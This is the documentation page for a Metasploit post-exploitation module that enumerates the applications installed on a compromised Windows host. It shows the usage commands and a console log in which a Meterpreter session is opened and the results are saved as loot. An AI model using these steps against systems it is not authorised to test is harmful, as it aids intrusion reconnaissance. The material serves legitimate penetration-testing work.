documentation/modules/post/windows/gather/enum_applications.md
This module will enumerate all installed applications on a Windows system.
use post/windows/gather/enum_applicationsset SESSION <session id>runThe session to run this module on.
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-10 14:18:44 -0700
msf exploit(windows/smb/group_policy_startup) > use post/windows/gather/enum_applications
msf post(windows/gather/enum_applications) > set SESSION 1
SESSION => 1
msf post(windows/gather/enum_applications) > run
[*] Enumerating applications installed on PC
Installed Applications
======================
Name Version
---- -------
PuTTY release 0.73 0.73.0.0
[+] Results stored in: /root/.msf4/loot/20191211092812_default_192.168.1.4_host.application_951840.txt
[*] Post module execution completed
```